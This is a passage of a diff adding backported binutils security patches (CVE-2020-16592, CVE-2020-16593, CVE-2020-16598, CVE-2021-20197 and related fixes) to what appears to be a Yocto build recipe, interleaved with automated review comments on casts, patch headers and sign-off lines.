+ return DEBUG_TYPE_NULL;
+ }
+- if (info->xcoff_types[-typenum] != NULL)
+- return info->xcoff_types[-typenum];
++ if (info->xcoff_types[typenum] != NULL)
++ return info->xcoff_types[typenum];
+
+- switch (-typenum)
++ switch (typenum)
+ {
+- case 1:
++ case 0:
+ /* The size of this and all the other types are fixed, defined
+ by the debugging format. */
+ name = "int";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 2:
++ case 1:
+ name = "char";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 3:
++ case 2:
+ name = "short";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 4:
++ case 3:
+ name = "long";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 5:
++ case 4:
+ name = "unsigned char";
+ rettype = debug_make_int_type (dhandle, 1, TRUE);
+ break;
+- case 6:
++ case 5:
+ name = "signed char";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 7:
++ case 6:
+ name = "unsigned short";
+ rettype = debug_make_int_type (dhandle, 2, TRUE);
+ break;
+- case 8:
++ case 7:
+ name = "unsigned int";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 9:
++ case 8:
+ name = "unsigned";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 10:
++ case 9:
+ name = "unsigned long";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 11:
++ case 10:
+ name = "void";
+ rettype = debug_make_void_type (dhandle);
+ break;
+- case 12:
++ case 11:
+ /* IEEE single precision (32 bit). */
+ name = "float";
+ rettype = debug_make_float_type (dhandle, 4);
+ break;
+- case 13:
++ case 12:
+ /* IEEE double precision (64 bit). */
+ name = "double";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 14:
++ case 13:
+ /* This is an IEEE double on the RS/6000, and different machines
+ with different sizes for "long double" should use different
+ negative type numbers. See stabs.texinfo. */
+ name = "long double";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 15:
++ case 14:
+ name = "integer";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 16:
++ case 15:
+ name = "boolean";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 17:
++ case 16:
+ name = "short real";
+ rettype = debug_make_float_type (dhandle, 4);
+ break;
+- case 18:
++ case 17:
+ name = "real";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 19:
++ case 18:
+ /* FIXME */
+ name = "stringptr";
+ rettype = NULL;
+ break;
+- case 20:
++ case 19:
+ /* FIXME */
+ name = "character";
+ rettype = debug_make_int_type (dhandle, 1, TRUE);
+ break;
+- case 21:
++ case 20:
+ name = "logical*1";
+ rettype = debug_make_bool_type (dhandle, 1);
+ break;
+- case 22:
++ case 21:
+ name = "logical*2";
+ rettype = debug_make_bool_type (dhandle, 2);
+ break;
+- case 23:
++ case 22:
+ name = "logical*4";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 24:
++ case 23:
+ name = "logical";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 25:
++ case 24:
+ /* Complex type consisting of two IEEE single precision values. */
+ name = "complex";
+ rettype = debug_make_complex_type (dhandle, 8);
+ break;
+- case 26:
++ case 25:
+ /* Complex type consisting of two IEEE double precision values. */
+ name = "double complex";
+ rettype = debug_make_complex_type (dhandle, 16);
+ break;
+- case 27:
++ case 26:
+ name = "integer*1";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 28:
++ case 27:
+ name = "integer*2";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 29:
++ case 28:
+ name = "integer*4";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 30:
++ case 29:
+ /* FIXME */
+ name = "wchar";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 31:
++ case 30:
+ name = "long long";
+ rettype = debug_make_int_type (dhandle, 8, FALSE);
+ break;
+- case 32:
++ case 31:
+ name = "unsigned long long";
+ rettype = debug_make_int_type (dhandle, 8, TRUE);
+ break;
+- case 33:
++ case 32:
+ name = "logical*8";
+ rettype = debug_make_bool_type (dhandle, 8);
+ break;
+- case 34:
++ case 33:
+ name = "integer*8";
+ rettype = debug_make_int_type (dhandle, 8, FALSE);
+ break;
+@@ -3664,9 +3665,7 @@ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+ }
+
+ rettype = debug_name_type (dhandle, name, rettype);
+-
+- info->xcoff_types[-typenum] = rettype;
+-
++ info->xcoff_types[typenum] = rettype;
+ return rettype;
+ }
+
+--
+2.27.0
+
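Review bot: In stab_xcoff_builtin_type the error path now passes `-typenum - 1`, an unsigned int expression, to a `%d` conversion, so the original negative type number is printed only through reinterpretation of the unsigned value. An explicit cast states the intent: `fprintf (stderr, _("Unrecognized XCOFF type %d\n"), (int) (-typenum - 1));`. This is a backport, so any such change diverges from upstream and would need a line in the patch header. The new check `typenum >= XCOFF_TYPE_COUNT` is sufficient only if `info->xcoff_types` is declared with XCOFF_TYPE_COUNT elements, and that declaration is outside the hunk.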
diff --git a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
index 11a8110d40..88cce49e46 100644
--- a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
+++ b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
@@ -1,4 +1,4 @@
-From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001
+From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001
From: Khem Raj <raj.khem@gmail.com>
Date: Fri, 15 Jan 2016 06:31:09 +0000
Subject: [PATCH] warn for uses of system directories when cross linking
@@ -59,8 +59,8 @@ Signed-off-by: Khem Raj <raj.khem@gmail.com>
ld/ldfile.c | 17 +++++++++++++++++
ld/ldlex.h | 2 ++
ld/ldmain.c | 2 ++
- ld/lexsup.c | 15 +++++++++++++++
- 9 files changed, 85 insertions(+)
+ ld/lexsup.c | 16 ++++++++++++++++
+ 9 files changed, 86 insertions(+)
diff --git a/ld/config.in b/ld/config.in
index d93c9b0830..5da2742bea 100644
@@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644
#undef EXTRA_SHLIB_EXTENSION
diff --git a/ld/configure b/ld/configure
-index 811134a503..f8c17c19ae 100755
+index f432f4637d..a9da3c115e 100755
--- a/ld/configure
+++ b/ld/configure
-@@ -826,6 +826,7 @@ with_lib_path
+@@ -830,6 +830,7 @@ with_lib_path
enable_targets
enable_64_bit_bfd
with_sysroot
@@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755
enable_gold
enable_got
enable_compressed_debug_sections
-@@ -1491,6 +1492,8 @@ Optional Features:
+@@ -1495,6 +1496,8 @@ Optional Features:
--disable-largefile omit support for large files
--enable-targets alternative target configurations
--enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes)
@@ -97,7 +97,7 @@ index 811134a503..f8c17c19ae 100755
--enable-gold[=ARG] build gold [ARG={default,yes,no}]
--enable-got=<type> GOT handling scheme (target, single, negative,
multigot)
-@@ -15788,6 +15791,19 @@ fi
+@@ -16624,6 +16627,19 @@ fi
@@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644
/* The initial parser states. */
diff --git a/ld/ldmain.c b/ld/ldmain.c
-index da1ad17763..12d0b07d8a 100644
+index c4af10f4e9..95b56b2d2d 100644
--- a/ld/ldmain.c
+++ b/ld/ldmain.c
-@@ -274,6 +274,8 @@ main (int argc, char **argv)
+@@ -273,6 +273,8 @@ main (int argc, char **argv)
command_line.warn_mismatch = TRUE;
command_line.warn_search_mismatch = TRUE;
command_line.check_section_addresses = -1;
@@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644
/* We initialize DEMANGLING based on the environment variable
COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the
diff --git a/ld/lexsup.c b/ld/lexsup.c
-index 3d15cc491d..0e8b4f2b7a 100644
+index 3d15cc491d..6478821443 100644
--- a/ld/lexsup.c
+++ b/ld/lexsup.c
@@ -550,6 +550,14 @@ static const struct ld_option ld_options[] =
@@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644
};
#define OPTION_COUNT ARRAY_SIZE (ld_options)
-@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv)
-
+@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv)
case OPTION_PRINT_MAP_DISCARDED:
config.print_map_discarded = TRUE;
+ break;
+
+ case OPTION_NO_POISON_SYSTEM_DIRECTORIES:
+ command_line.poison_system_directories = FALSE;
@@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644
+
+ case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES:
+ command_line.error_poison_system_directories = TRUE;
- break;
++ break;
}
}
diff --git a/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
new file mode 100644
index 0000000000..dc1e09d46b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
@@ -0,0 +1,32 @@
+From bf2252dca8c76e4c1f1c2dbf98dab7ffc9f5e5af Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Sat, 29 Aug 2020 08:03:15 +0100
+Subject: [PATCH] Include members in the variable table used when resolving
+ DW_AT_specification tags.
+
+ PR 26520
+ * dwarf2.c (scan_unit_for_symbols): Add member entries to the
+ variable table.
+
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=e6f04d55f681149a69102a73937d0987719c3f16]
+---
+ bfd/dwarf2.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index dd3568a8532..ef2f6a3c63c 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -3248,7 +3248,8 @@ scan_unit_for_symbols (struct comp_unit *unit)
+ else
+ {
+ func = NULL;
+- if (abbrev->tag == DW_TAG_variable)
++ if (abbrev->tag == DW_TAG_variable
++ || abbrev->tag == DW_TAG_member)
+ {
+ bfd_size_type amt = sizeof (struct varinfo);
+ var = (struct varinfo *) bfd_zalloc (abfd, amt);
+--
+2.34.1
+
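Review bot: This patch header has no `Signed-off-by:` line from the person who backported it, unlike the other patch files added in this commit. Its `From` hash bf2252dca8c76e4c1f1c2dbf98dab7ffc9f5e5af also differs from the e6f04d55f681149a69102a73937d0987719c3f16 named in `Upstream-Status`. Add `Signed-off-by: <backporter name and address>` and one sentence stating which of the two hashes is the upstream mainline commit and why this non-CVE change is carried. The `DW_TAG_member` condition is in scan_unit_for_symbols, whose body starts and ends outside the inner hunk.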
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch
new file mode 100644
index 0000000000..f5f9ccdd53
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch
@@ -0,0 +1,61 @@
+From 7ecb51549ab1ec22aba5aaf34b70323cf0b8509a Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Apr 2020 18:58:11 +0930
+Subject: [PATCH] PR25823, Use after free in bfd_hash_lookup
+
+ PR 25823
+ * peXXigen.c (_bfd_XXi_swap_sym_in <C_SECTION>): Don't use a
+ pointer into strings that may be freed for section name, always
+ allocate a new string.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=7ecb51549ab1ec22aba5aaf34b70323cf0b8509a]
+CVE: CVE-2020-16592
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/peXXigen.c | 20 ++++++++++----------
+ 1 files changed, 10 insertions(+), 10 deletions(-)
+
+diff --git a/bfd/peXXigen.c b/bfd/peXXigen.c
+index b9eeb775d9b..8aa5914acd9 100644
+--- a/bfd/peXXigen.c
++++ b/bfd/peXXigen.c
+@@ -177,25 +177,25 @@ _bfd_XXi_swap_sym_in (bfd * abfd, void * ext1, void * in1)
+ int unused_section_number = 0;
+ asection *sec;
+ flagword flags;
++ size_t name_len;
++ char *sec_name;
+
+ for (sec = abfd->sections; sec; sec = sec->next)
+ if (unused_section_number <= sec->target_index)
+ unused_section_number = sec->target_index + 1;
+
+- if (name == namebuf)
++ name_len = strlen (name) + 1;
++ sec_name = bfd_alloc (abfd, name_len);
++ if (sec_name == NULL)
+ {
+- name = (const char *) bfd_alloc (abfd, strlen (namebuf) + 1);
+- if (name == NULL)
+- {
+- _bfd_error_handler (_("%pB: out of memory creating name for empty section"),
+- abfd);
+- return;
+- }
+- strcpy ((char *) name, namebuf);
++ _bfd_error_handler (_("%pB: out of memory creating name "
++ "for empty section"), abfd);
++ return;
+ }
++ memcpy (sec_name, name, name_len);
+
+ flags = SEC_HAS_CONTENTS | SEC_ALLOC | SEC_DATA | SEC_LOAD;
+- sec = bfd_make_section_anyway_with_flags (abfd, name, flags);
++ sec = bfd_make_section_anyway_with_flags (abfd, sec_name, flags);
+ if (sec == NULL)
+ {
+ _bfd_error_handler (_("%pB: unable to create fake empty section"),
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
new file mode 100644
index 0000000000..c7c7829261
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
@@ -0,0 +1,204 @@
+From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 16 Apr 2020 17:49:38 +0930
+Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols
+
+ PR 25827
+ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
+ strdup(0).
+
+Upstream-Status: Backport
+https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729
+CVE: CVE-2020-16593
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: git/bfd/dwarf2.c
+===================================================================
+--- git.orig/bfd/dwarf2.c
++++ git/bfd/dwarf2.c
+@@ -295,12 +295,12 @@ struct comp_unit
+ /* This data structure holds the information of an abbrev. */
+ struct abbrev_info
+ {
+- unsigned int number; /* Number identifying abbrev. */
+- enum dwarf_tag tag; /* DWARF tag. */
+- int has_children; /* Boolean. */
+- unsigned int num_attrs; /* Number of attributes. */
+- struct attr_abbrev *attrs; /* An array of attribute descriptions. */
+- struct abbrev_info *next; /* Next in chain. */
++ unsigned int number; /* Number identifying abbrev. */
++ enum dwarf_tag tag; /* DWARF tag. */
++ bfd_boolean has_children; /* TRUE if the abbrev has children. */
++ unsigned int num_attrs; /* Number of attributes. */
++ struct attr_abbrev * attrs; /* An array of attribute descriptions. */
++ struct abbrev_info * next; /* Next in chain. */
+ };
+
+ struct attr_abbrev
+@@ -1487,6 +1487,8 @@ struct varinfo
+ {
+ /* Pointer to previous variable in list of all variables */
+ struct varinfo *prev_var;
++ /* The offset of the varinfo from the start of the unit. */
++ bfd_uint64_t unit_offset;
+ /* Source location file name */
+ char *file;
+ /* Source location line number */
+@@ -1497,7 +1499,7 @@ struct varinfo
+ /* Where the symbol is defined */
+ asection *sec;
+ /* Is this a stack variable? */
+- unsigned int stack: 1;
++ bfd_boolean stack;
+ };
+
+ /* Return TRUE if NEW_LINE should sort after LINE. */
+@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct
+ struct varinfo* each;
+
+ for (each = unit->variable_table; each; each = each->prev_var)
+- if (each->stack == 0
++ if (! each->stack
+ && each->file != NULL
+ && each->name != NULL
+ && each->addr == addr
+@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit,
+ return TRUE;
+ }
+
++static struct varinfo *
++lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table)
++{
++ while (table)
++ {
++ if (table->unit_offset == offset)
++ return table;
++ table = table->prev_var;
++ }
++
++ return NULL;
++}
++
++
+ /* DWARF2 Compilation unit functions. */
+
+ /* Scan over each die in a comp. unit looking for functions to add
+@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit
+ bfd_vma low_pc = 0;
+ bfd_vma high_pc = 0;
+ bfd_boolean high_pc_relative = FALSE;
++ bfd_uint64_t current_offset;
++
++ current_offset = info_ptr - unit->info_ptr_unit;
+
+ /* PR 17512: file: 9f405d9d. */
+ if (info_ptr >= info_ptr_end)
+@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit
+ goto fail;
+ }
+
+- var = NULL;
+ if (abbrev->tag == DW_TAG_subprogram
+ || abbrev->tag == DW_TAG_entry_point
+ || abbrev->tag == DW_TAG_inlined_subroutine)
+ {
+ bfd_size_type amt = sizeof (struct funcinfo);
++
++ var = NULL;
+ func = (struct funcinfo *) bfd_zalloc (abfd, amt);
+ if (func == NULL)
+ goto fail;
+@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit
+ if (var == NULL)
+ goto fail;
+ var->tag = abbrev->tag;
+- var->stack = 1;
++ var->stack = TRUE;
+ var->prev_var = unit->variable_table;
+ unit->variable_table = var;
++ var->unit_offset = current_offset;
+ /* PR 18205: Missing debug information can cause this
+ var to be attached to an already cached unit. */
+ }
+-
++ else
++ var = NULL;
+ /* No inline function in scope at this nesting level. */
+ nested_funcs[nesting_level].func = 0;
+ }
+@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit
+ {
+ switch (attr.name)
+ {
++ case DW_AT_specification:
++ if (attr.u.val)
++ {
++ struct varinfo * spec_var;
++
++ spec_var = lookup_var_by_offset (attr.u.val,
++ unit->variable_table);
++ if (spec_var == NULL)
++ {
++ _bfd_error_handler (_("DWARF error: could not find "
++ "variable specification "
++ "at offset %lx"),
++ (unsigned long) attr.u.val);
++ break;
++ }
++
++ if (var->name == NULL)
++ var->name = spec_var->name;
++ if (var->file == NULL && spec_var->file != NULL)
++ var->file = strdup (spec_var->file);
++ if (var->line == 0)
++ var->line = spec_var->line;
++ if (var->sec == NULL)
++ var->sec = spec_var->sec;
++ }
++ break;
++
+ case DW_AT_name:
+ if (is_str_attr (attr.form))
+ var->name = attr.u.str;
+@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit
+
+ case DW_AT_external:
+ if (attr.u.val != 0)
+- var->stack = 0;
++ var->stack = FALSE;
+ break;
+
+ case DW_AT_location:
+@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit
+ if (attr.u.blk->data != NULL
+ && *attr.u.blk->data == DW_OP_addr)
+ {
+- var->stack = 0;
++ var->stack = FALSE;
+
+ /* Verify that DW_OP_addr is the only opcode in the
+ location, in which case the block size will be 1
+@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug
+ each_var = each_var->prev_var)
+ {
+ /* Skip stack vars and vars with no files or names. */
+- if (each_var->stack == 0
++ if (! each_var->stack
+ && each_var->file != NULL
+ && each_var->name != NULL)
+ /* There is no need to copy name string into hash table as
+Index: git/bfd/ChangeLog
+===================================================================
+--- git.orig/bfd/ChangeLog
++++ git/bfd/ChangeLog
+@@ -1,3 +1,9 @@
++2020-04-16 Alan Modra <amodra@gmail.com>
++
++ PR 25827
++ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
++ strdup(0).
++
+ 2021-05-03 Alan Modra <amodra@gmail.com>
+
+ PR 27755
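Review bot: The header describes only the upstream change "Wrap overlong lines. Don't strdup(0)", but the diff also adds `lookup_var_by_offset`, the `unit_offset` field and the whole `case DW_AT_specification:` branch. It therefore appears to fold in an earlier upstream change that this branch lacked. The header should name that prerequisite, for example `Upstream-Status: Backport [aec72fda3b32 plus prerequisite <upstream commit id>]`, so the extra code is not mistaken for part of the CVE fix. In the new branch, `"at offset %lx"` receives `(unsigned long) attr.u.val`, which would truncate the reported offset where long is 32 bits. scan_unit_for_symbols is only partly visible in these inner hunks.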
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch
new file mode 100644
index 0000000000..52bd925c97
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch
@@ -0,0 +1,32 @@
+From ca3f923f82a079dcf441419f4a50a50f8b4b33c2 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Apr 2020 10:38:16 +0930
+Subject: [PATCH] PR25840, Null pointer dereference in objdump
+
+ PR 25840
+ * debug.c (debug_class_type_samep): Don't segfault on NULL type.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=ca3f923f82a079dcf441419f4a50a50f8b4b33c2]
+CVE: CVE-2020-16598
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ binutils/debug.c | 2 ++
+ 1 files changed, 2 insertions(+)
+
+diff --git a/binutils/debug.c b/binutils/debug.c
+index 022fa4edffb..5470e155edc 100644
+--- a/binutils/debug.c
++++ b/binutils/debug.c
+@@ -3277,6 +3277,8 @@ debug_class_type_samep (struct debug_handle *info, struct debug_type_s *t1,
+ names, since that sometimes fails in the presence of
+ typedefs and we really don't care. */
+ if (strcmp (f1->name, f2->name) != 0
++ || f1->type == NULL
++ || f2->type == NULL
+ || ! debug_type_samep (info,
+ debug_get_real_type ((void *) info,
+ f1->type, NULL),
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
new file mode 100644
index 0000000000..423814f98d
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
@@ -0,0 +1,572 @@
+From d3edaa91d4cf7202ec14342410194841e2f67f12 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 26 Feb 2021 11:30:32 +1030
+Subject: [PATCH v2] Reinstate various pieces backed out from smart_rename changes
+
+In the interests of a stable release various last minute smart_rename
+patches were backed out of the 2.36 branch. The main reason to
+reinstate some of those backed out changes here is to make necessary
+followup fixes to commit 8e03235147a9 simple cherry-picks from
+mainline. A secondary reason is that ar -M support isn't fixed for
+pr26945 without this patch.
+
+ PR 26945
+ * ar.c: Don't include libbfd.h.
+ (write_archive): Replace xmalloc+strcpy with xstrdup.
+ * arsup.c (temp_name, real_ofd): New static variables.
+ (ar_open): Use make_tempname and bfd_fdopenw.
+ (ar_save): Adjust to suit ar_open changes.
+ * objcopy.c: Don't include libbfd.h.
+ * rename.c: Rename and reorder variables.
+
+(cherry picked from commit 95b91a043aeaeb546d2fea556d84a2de1e917770)
+
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=d3edaa91d4cf7202ec14342410194841e2f67f12]
+CVE: CVE-2021-20197
+Signed-off-by: Vinay Kumar <vinay.m.engg@gmail.com>
+---
+ bfd/bfd-in2.h | 2 +
+ bfd/opncls.c | 33 ++++++++++
+ binutils/ar.c | 15 +++--
+ binutils/arsup.c | 37 ++++++++----
+ binutils/bucomm.c | 4 +-
+ binutils/bucomm.h | 5 +-
+ binutils/objcopy.c | 37 +++++++-----
+ binutils/rename.c | 148 +++++++++++----------------------------------
+ 8 files changed, 133 insertions(+), 148 deletions(-)
+
+diff --git a/bfd/bfd-in2.h b/bfd/bfd-in2.h
+index 2e453c50c18..e53f54a8ab7 100644
+--- a/bfd/bfd-in2.h
++++ b/bfd/bfd-in2.h
+@@ -588,6 +588,8 @@ bfd *bfd_openr (const char *filename, const char *target);
+
+ bfd *bfd_fdopenr (const char *filename, const char *target, int fd);
+
++bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
++
+ bfd *bfd_openstreamr (const char * filename, const char * target,
+ void * stream);
+
+diff --git a/bfd/opncls.c b/bfd/opncls.c
+index a03ad51c8fa..f9da97ed710 100644
+--- a/bfd/opncls.c
++++ b/bfd/opncls.c
+@@ -370,6 +370,39 @@ bfd_fdopenr (const char *filename, const char *target, int fd)
+ return bfd_fopen (filename, target, mode, fd);
+ }
+
++/*
++FUNCTION
++ bfd_fdopenw
++
++SYNOPSIS
++ bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
++
++DESCRIPTION
++ <<bfd_fdopenw>> is exactly like <<bfd_fdopenr>> with the exception that
++ the resulting BFD is suitable for output.
++*/
++
++bfd *
++bfd_fdopenw (const char *filename, const char *target, int fd)
++{
++ bfd *out = bfd_fdopenr (filename, target, fd);
++
++ if (out != NULL)
++ {
++ if (!bfd_write_p (out))
++ {
++ close (fd);
++ _bfd_delete_bfd (out);
++ out = NULL;
++ bfd_set_error (bfd_error_invalid_operation);
++ }
++ else
++ out->direction = write_direction;
++ }
++
++ return out;
++}
++
+ /*
+ FUNCTION
+ bfd_openstreamr
+diff --git a/binutils/ar.c b/binutils/ar.c
+index 1057db9980e..c33a11e0d70 100644
+--- a/binutils/ar.c
++++ b/binutils/ar.c
+@@ -1195,20 +1195,23 @@ write_archive (bfd *iarch)
+ bfd *obfd;
+ char *old_name, *new_name;
+ bfd *contents_head = iarch->archive_next;
++ int ofd = -1;
+
+- old_name = (char *) xmalloc (strlen (bfd_get_filename (iarch)) + 1);
+- strcpy (old_name, bfd_get_filename (iarch));
+- new_name = make_tempname (old_name);
++ old_name = xstrdup (bfd_get_filename (iarch));
++ new_name = make_tempname (old_name, &ofd);
+
+ if (new_name == NULL)
+ bfd_fatal (_("could not create temporary file whilst writing archive"));
+
+ output_filename = new_name;
+
+- obfd = bfd_openw (new_name, bfd_get_target (iarch));
++ obfd = bfd_fdopenw (new_name, bfd_get_target (iarch), ofd);
+
+ if (obfd == NULL)
+- bfd_fatal (old_name);
++ {
++ close (ofd);
++ bfd_fatal (old_name);
++ }
+
+ output_bfd = obfd;
+
+@@ -1246,7 +1249,7 @@ write_archive (bfd *iarch)
+ /* We don't care if this fails; we might be creating the archive. */
+ bfd_close (iarch);
+
+- if (smart_rename (new_name, old_name, 0) != 0)
++ if (smart_rename (new_name, old_name, NULL) != 0)
+ xexit (1);
+ free (old_name);
+ free (new_name);
+diff --git a/binutils/arsup.c b/binutils/arsup.c
+index 00967c972cd..b8ae4f7ec1a 100644
+--- a/binutils/arsup.c
++++ b/binutils/arsup.c
+@@ -42,6 +42,8 @@ extern int deterministic;
+
+ static bfd *obfd;
+ static char *real_name;
++static char *temp_name;
++static int real_ofd;
+ static FILE *outfile;
+
+ static void
+@@ -149,27 +151,24 @@ maybequit (void)
+ void
+ ar_open (char *name, int t)
+ {
+- char *tname;
+- const char *bname = lbasename (name);
+- real_name = name;
++ real_name = xstrdup (name);
++ temp_name = make_tempname (real_name, &real_ofd);
+
+- /* Prepend tmp- to the beginning, to avoid file-name clashes after
+- truncation on filesystems with limited namespaces (DOS). */
+- if (asprintf (&tname, "%.*stmp-%s", (int) (bname - name), name, bname) == -1)
++ if (temp_name == NULL)
+ {
+- fprintf (stderr, _("%s: Can't allocate memory for temp name (%s)\n"),
++ fprintf (stderr, _("%s: Can't open temporary file (%s)\n"),
+ program_name, strerror(errno));
+ maybequit ();
+ return;
+ }
+
+- obfd = bfd_openw (tname, NULL);
++ obfd = bfd_fdopenw (temp_name, NULL, real_ofd);
+
+ if (!obfd)
+ {
+ fprintf (stderr,
+ _("%s: Can't open output archive %s\n"),
+- program_name, tname);
++ program_name, temp_name);
+
+ maybequit ();
+ }
+@@ -344,16 +343,30 @@ ar_save (void)
+ }
+ else
+ {
+- char *ofilename = xstrdup (bfd_get_filename (obfd));
++ struct stat target_stat;
+
+ if (deterministic > 0)
+ obfd->flags |= BFD_DETERMINISTIC_OUTPUT;
+
+ bfd_close (obfd);
+
+- smart_rename (ofilename, real_name, 0);
++ if (stat (real_name, &target_stat) != 0)
++ {
++ /* The temp file created in ar_open has mode 0600 as per mkstemp.
++ Create the real empty output file here so smart_rename will
++ update the mode according to the process umask. */
++ obfd = bfd_openw (real_name, NULL);
++ if (obfd != NULL)
++ {
++ bfd_set_format (obfd, bfd_archive);
++ bfd_close (obfd);
++ }
++ }
++
++ smart_rename (temp_name, real_name, NULL);
+ obfd = 0;
+- free (ofilename);
++ free (temp_name);
++ free (real_name);
+ }
+ }
+
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index 9e6a02843e6..53244201f89 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -532,7 +532,7 @@ template_in_dir (const char *path)
+ as FILENAME. */
+
+ char *
+-make_tempname (const char *filename)
++make_tempname (const char *filename, int *ofd)
+ {
+ char *tmpname = template_in_dir (filename);
+ int fd;
+@@ -550,7 +550,7 @@ make_tempname (const char *filename)
+ free (tmpname);
+ return NULL;
+ }
+- close (fd);
++ *ofd = fd;
+ return tmpname;
+ }
+
+diff --git a/binutils/bucomm.h b/binutils/bucomm.h
+index d8318343f78..2b164e0af68 100644
+--- a/binutils/bucomm.h
++++ b/binutils/bucomm.h
+@@ -51,7 +51,7 @@ int display_info (void);
+
+ void print_arelt_descr (FILE *, bfd *, bfd_boolean, bfd_boolean);
+
